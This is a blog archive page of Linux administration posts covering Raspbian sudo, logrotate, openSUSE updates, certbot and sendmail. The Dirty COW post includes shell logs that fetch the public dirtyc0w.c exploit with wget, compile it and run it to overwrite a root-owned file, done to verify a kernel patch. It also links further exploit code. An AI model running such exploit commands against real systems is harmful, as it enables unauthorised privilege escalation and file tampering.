The Wiert Corner – irregular stream of stuff

Jeroen W. Pluimers on .NET, C#, Delphi, databases, and personal interests

  • My badges

    Mastodon

  • Twitter Updates

  • My Flickr Stream

    20140508-Delphi-2007--Project-Options--Cannot-Edit-Application-Title-HelpFile-Icon-Theming20140430-Fiddler-Filter-Actions-Button-Run-Filterset-now20140424-VMware-Fusion-6.0.3.-no-reclaimable
    More Photos

  • Pages

  • All categories

  • Enter your email address to subscribe to this blog and receive notifications of new posts by email.

    Join 1,862 other subscribers

Archive for the ‘Linux’ Category

« Previous Entries
Next Entries »

Reminder to self: nosudoers changed in Raspbian…

Posted by jpluimers on 2016/10/31

So I won’t forget: trying to make sense of this incomprehensible message (and the update on a Raspberry Pi takes looooooooong and while updating, the file /etc/sudoers.d/010_pi-nopasswd does not exist yet)

20161018+1 reintroduces passwordless sudo for pi user even if previously removed · Issue #6 · RPi-Distro/raspberrypi-sys-mods [WayBack]

raspberrypi-sys-mods (20161018+3) jessie; urgency=medium

  * The 20161018 release has introduced a /etc/sudoers.d/010_pi-nopasswd file.
    - The file is installed even if the "pi ALL=(ALL) NOPASSWD: ALL" entry has been
      previously removed from /etc/sudoers by the user.
    - If you do not want the entry to exist, please comment out or remove 010_pi-nopasswd.
    - If upgrading to 20161018+3 from a version earlier than 20161018, the line in
      010_pi-nopasswd is automatically commented out if the entry doesn't exist in sudoers.
    - See https://github.com/RPi-Distro/raspberrypi-sys-mods/issues/6

 -- Serge Schneider   Wed, 19 Oct 2016 10:52:07 +0100

And after like an hour of waiting:

[master b78090b] committing changes in /etc after apt run
 6 files changed, 52 insertions(+), 29 deletions(-)
 rewrite apt/apt.conf.d/01autoremove-kernels (88%)
 create mode 100644 sudoers.d/010_pi-nopasswd

–jeroen

Posted in *nix, Debian, Linux, Power User, Raspbian | 2 Comments »

On OpenSuSE, when adding Apache vhosts with their own log files don’t forget to update your logrotate configuration

Posted by jpluimers on 2016/10/27

Sometimes you forget one crucial step…

When adding Apache vhosts on OpenSuSE and each vhost has it’s own set of log-files, then they will not be logrotated by default.

So you have to edit the configuration.

I’ve done it by copying the default apache2 logrotate configuration file for each vhost like this:

/etc/logrotate.d # cp apache2 apache2.vhost.##hostname##

Here ##hostname## is the name of the vhost.

Then I edited each file and replaced the generic log file names with the specific ones for each vhost.

There are only a few vhosts on my system so the manual job wasn’t so bad, but with a great number of vhosts you’d probably want to make this a template process beyond this:

function logrotate-add-apache2-vhost-file()
{
  # $1 is the vhost name
  ## http://stackoverflow.com/questions/16790793/how-to-replace-strings-containing-slashes-with-sed/16790877#16790877
  cat /etc/logrotate.d/apache2 | sed -r "s#/var/log/apache2/#/var/log/apache2/$1-#g" > /etc/logrotate.d/apache2.vhost.$1 
  git add /etc/logrotate.d/apache2.vhost.$1
}

This will then show in less what logrotate (which will output both to stderr and stdout, hence the 2>&1 redirect) would do on the next invocation:

logrotate -d /etc/logrotate.conf 2>&1 | less

And this is a very nice logrotate alias as well:

alias logrotate-show-status='echo "# systemctl list-timers --all" && systemctl list-timers --all && echo "# systemctl status logrotate.timer --full" && systemctl status logrotate.timer --full && echo "# journalctl -u logrotate" && journal

–jeroen

Posted in *nix, *nix-tools, Apache2, Development, Linux, logrotate, openSuSE, Power User, Scripting, Software Development, SuSE Linux, Tumbleweed | 1 Comment »

OpenSuSE Tumbleweed: after installing from ISO, be sure to disable/remove the ISO repo

Posted by jpluimers on 2016/10/26

TL;DR: OpenSuSE Tumbleweed – after installing from ISO, be sure to disable/remove the ISO repo.

A while ago I had a weird thing on my OpenSuSE Tumbleweed system while upgrading (yes, zypper dist-upgrade is the recommended way to update Tumbleweed): it would complain in this way zypper dup indicates python3-urllib3-1.16-1.1.noarch requires python(abi) = 3.5:

# zypper dup
Warning: You are about to do a distribution upgrade with all enabled repositories. Make sure these repositories are compatible before you continue. See 'man zypper' for more information about this command.
Loading repository data...
Reading installed packages...
Computing distribution upgrade...

Problem: python3-urllib3-1.16-1.1.noarch requires python(abi) = 3.5, but this requirement cannot be provided
 Solution 1: Following actions will be done:
  deinstallation of python3-urllib3-1.15.1-2.1.noarch
  deinstallation of python3-wheel-0.29.0-2.1.noarch
  deinstallation of speedtest-cli-0.3.2-4.3.noarch
  deinstallation of python3-six-1.10.0-4.1.noarch
  deinstallation of python3-pycparser-2.14-2.1.noarch
  deinstallation of python3-pyasn1-0.1.9-2.1.noarch
  deinstallation of python3-pyOpenSSL-16.0.0-3.1.noarch
  deinstallation of python3-idna-2.1-1.1.noarch
  deinstallation of python3-chardet-2.3.0-1.4.noarch
 Solution 2: keep obsolete python-cupshelpers-1.5.7-7.2.noarch
 Solution 3: break python3-urllib3-1.16-1.1.noarch by ignoring some of its dependencies

Choose from above solutions by number or cancel [1/2/3/c] (c):

What eventually – with help from the excellent help by DimStar on the #openSUSE-factory IRC channel – led to the solution was the part Solution 2: keep obsolete python-cupshelpers-1.5.7-7.2.noarch.

But first let’s look at the installed versions and repos:

Read the rest of this entry »

Posted in *nix, Development, Internet, Linux, openSuSE, Power User, Scripting, Software Development, SpeedTest, SuSE Linux, Tumbleweed | Leave a Comment »

How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ]

Posted by jpluimers on 2016/10/21

There is a nasty (Dirty COW: CVE-2016-5195) Linux kernel bug with zero-day exploits floating around

OpenSuSE updates will be available soon (likely this weekend); from the  #openSUSE-factory IRC channel :

wiert: any E.T.A. for CVE-2016-5195 in the various releases?

_Marcus_: 13.1 and 42.1 i just released. 13.2 submission i am still awaiting, so release likely tomorrow

wiert: How about Tumbleweed?

DimStar: for TW, I have it in staging and will try to squeeze it into the 1021 snapshot
so unlike something really bad happened, it should be shipping tomorrow or Sunday

via: How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ] [WayBack]

Progress can be tracked at https://bugzilla.suse.com/show_bug.cgi?id=CVE-2016-5195 (via simotek a.k.a. Simon Lees at IRC). Hopefully 13.2 will get released on Monday.

Edit: 13.2 didn’t make it on monday. Progress can be found via https://build.opensuse.org/project/maintenance_incidents/openSUSE:Maintenance (slow loading page!) and is at https://build.opensuse.org/project/show/openSUSE:Maintenance:5752

More exploits at https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

–jeroen

Testing 13.2:

# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
# zypper patch

This works fine in await of the formal update process and me testing it resulted in the release of the kernel to the official 13.2 update, but note you still have to reboot after the update even though the process doesn’t tell you that:

wiert: @_Marcus_ “klopt als een zwerende vinger” or in English: works splendid. install and test log at https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e
wiert: @_Marcus_ thanks about teaching me about `zypper patch`. Need to run for the fundraising event now.
_Marcus_: wiert: thanks :)
wiert: @_Marcus_ no problem. Given the work you guys (and gals?) do it’s a small thing with the added bonus of contributing to my motto “life is about learning new things every day”.
_Marcus_: after your feedback i have now released the kenel ;)
wiert: @_Marcus_ great, looking forward to the actual update later. Thanks a lot!
wiert: @_Marcus_ I’ve updated the gist: 13.2 plus official dirty-COW update needs reboot, but the update process doesn’t list about reboot. Didn’t get the full zypper output, but I after updating I did a before/after reboot comparison of the behaviour. Results in https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e#file-testing-official-update-before-reboot-then-reboot-retest-txt


# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
Adding repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' ……………………………………………………………………………………………………………………………………………………………………………..[done]
Repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' successfully added
Enabled : Yes
Autorefresh : No
GPG Check : Yes
URI : http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/
# zypper patch
New repository or package signing key received:
Repository: openSUSE:Maintenance:5752 (openSUSE_13.2_Update)
Key Name: openSUSE:Maintenance OBS Project <openSUSE:Maintenance@build.opensuse.org>
Key Fingerprint: 7C097045 B0D351D3 69AC453A 598D0E63 B3FD7E48
Key Created: Thu Aug 6 11:49:53 2015
Key Expires: Sat Oct 14 11:49:53 2017
Rpm Name: gpg-pubkey-b3fd7e48-55c32dc1
Do you want to reject the key, trust temporarily, or trust always? [r/t/a/? shows all options] (r): t
Building repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' cache ………………………………………………………………………………………………………………………………………………………………………[done]
Loading repository data…
Reading installed packages…
Resolving package dependencies…
The following NEW package is going to be installed:
kernel-default-3.16.7-45.1
The following NEW patch is going to be installed:
5752
1 new package to install.
Overall download size: 45.2 MiB. Already cached: 0 B After the operation, additional 213.5 MiB will be used.
Continue? [y/n/? shows all options] (y): y
Retrieving package kernel-default-3.16.7-45.1.x86_64 (1/1), 45.2 MiB (213.5 MiB unpacked)
Retrieving: kernel-default-3.16.7-45.1.x86_64.rpm ……………………………………………………………………………………………………………………………………………………………………………………[done (3.6 MiB/s)]
Checking for file conflicts: …………………………………………………………………………………………………………………………………………………………………………………………………………………[done]
(1/1) Installing: kernel-default-3.16.7-45.1 …………………………………………………………………………………………………………………………………………………………………………………………………..[done]
Additional rpm output:
warning: /var/cache/zypp/packages/openSUSE_Maintenance_5752/x86_64/kernel-default-3.16.7-45.1.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID b3fd7e48: NOKEY
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
Warning: One of installed patches requires reboot of your machine. Reboot as soon as possible.
# reboot

view raw

installing-patch.txt

hosted with ❤ by GitHub


(1/3) Installing: kernel-default-3.16.7-45.1 ……………………………………………………………………………………………….[done]
Additional rpm output:
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
(2/3) Installing: ghostscript-9.15-6.1 …………………………………………………………………………………………………….[done]
(3/3) Installing: ghostscript-x11-9.15-6.1 …………………………………………………………………………………………………[done]

view raw

tail-log-of-official-update.txt

hosted with ❤ by GitHub


$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su –
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap ffffffffffffffff
madvise -100000000
procselfmem -100000000
$ cat foo
cat: foo: No such file or directory
$ sudo su –
# cat foo
this is not a test
# logout

view raw

testing-after-reboot.txt

hosted with ❤ by GitHub


$ cd /tmp/
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su –
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f6ab7207000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
$ sudo su –
# reboot
login
$ cd /tmp/
$ sudo su –
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f5465983000
madvise 0
procselfmem 1800000000
$ cat foo
this is not a test

view raw

testing-official-update-before-reboot-then-reboot-retest.txt

hosted with ❤ by GitHub

Posted in *nix, openSuSE, Power User, SuSE Linux, Tumbleweed | Leave a Comment »

letsenctrypt certbot-auto – finding what certificates are there and which apache configurations use them

Posted by jpluimers on 2016/10/13

IRC #letsencrypt-dev today:

wiert

Is there any way for `certbot-auto` to show for which domains/apache-configs it has certificates?

pdeee

wiert, we actually made a ticket for 0.10.0 to do that

https://github.com/certbot/certbot/issues/3615

in the mean time, your imperfect options are:

for file in /etc/letsencrypt/live/*/fullchain.pem ; do echo -n $file ;  openssl x509 -text -noout -in $file | grep DNS; done

for installation in Apache configs, you can follow that with:

grep /etc/letsencrypt/live /etc/apache2/sites-enabled/*

wiert

@pdeee on OpenSuSE, the last statement should be

grep -r /etc/letsencrypt/live /etc/apache2/*

–jeroen

Posted in *nix, Encryption, Let's Encrypt (letsencrypt/certbot), Linux, openSuSE, Power User, Security, SuSE Linux | Leave a Comment »

Wish ttystudio was available for OpenSuSE and Mac OS X…

Posted by jpluimers on 2016/10/10

Really interesting stuff: ttystudio. It allows to record an apng or gif of a terminal session (so it should work on headless systems).

Anyone knowing alternatives for OpenSuSE and Mac OS X?

(Cockos Incorporated | LICEcap might cut it on Mac OS X, but not on headless systems so GNOME/byzanz doesn’t cut it either)

Sources:

Handy as well:

–jeroen

Posted in *nix, *nix-tools, Apple, Linux, Mac, Mac OS X / OS X / MacOS, MacBook, MacBook Retina, MacBook-Air, MacBook-Pro, MacMini, openSuSE, Power User, SuSE Linux, Tumbleweed | Leave a Comment »

Happy 25th birthday Linux!

Posted by jpluimers on 2016/10/05

Linux turns 25 today: Linux – Wikipedia, the free encyclopedia

Happy birthday!

–jeroen

Posted in *nix, Linux, Power User | Leave a Comment »

Awesome vim cheat sheet for your consideration. Download #vimcheatsheet

Posted by jpluimers on 2016/09/26

Awesome vim cheat sheet for your consideration. Download http://vimcheatsheet.com

You can either

  1. buy the poster (which is now at version 2.0),
  2. buy the digital PDF downloads (at version 2.0 too),
  3. get the free small resolution PNG downloads at 1024 x 700 or 1979 x 1346.

–jeroen

via:

Read the rest of this entry »

Posted in *nix, *nix-tools, Linux, openSuSE, Power User, SuSE Linux | Leave a Comment »

Converting sendmail .db files to text

Posted by jpluimers on 2016/09/15

If you want to inverse the work of newaliases, you can use makemap to convert them to text:

makemap -u hash access.db

This is quite handy to see if the newaliases indeed put all information into the db file (for instance if you use a script, you can verify it ran correctly).

It works for any db, but you need to be aware of the database format: hash type or btree type.

To my knowledge only one uses the btree type format:

  • userdb.db

All others use hash type format:

  • aliases.db
  • aliases-maillist.db
  • mailertable.db
  • genericstable.db
  • virtusertable.db
  • access.db
  • auth-info.db
  • domaintable.db

–jeroen

via: Reading Sendmail .db files.

Posted in *nix, *nix-tools, bash, Development, Linux, openSuSE, Power User, Scripting, Software Development, SuSE Linux | Leave a Comment »

Flush deferred messages in sendmail queue :: Stephan Paukner :: syslog

Posted by jpluimers on 2016/09/12

Be careful with setting the timeout of sendmail to zero when trying to flush the mail queue:

sendmail -OTimeout.hoststatus=0m -q -v

Reason: a lot of target systems do rate-limiting if you retry too much in too short time, for instance gmail does that:

421-4.7.0 [###.###.###.### 15] Our system has detected an unusual rate of
421-4.7.0 unsolicited mail originating from your IP address. To protect our
421-4.7.0 users from spam, mail sent from your IP address has been temporarily
421-4.7.0 rate limited. Please visit
421-4.7.0 https://support.google.com/mail/answer/81126 to review our Bulk Email
421 4.7.0 Senders Guidelines. w1si28749381wju.16 - gsmtp

–jeroen

via Flush deferred messages in sendmail queue :: Stephan Paukner :: syslog.

Posted in *nix, *nix-tools, Linux, openSuSE, Power User, SuSE Linux | Leave a Comment »

« Previous Entries
Next Entries »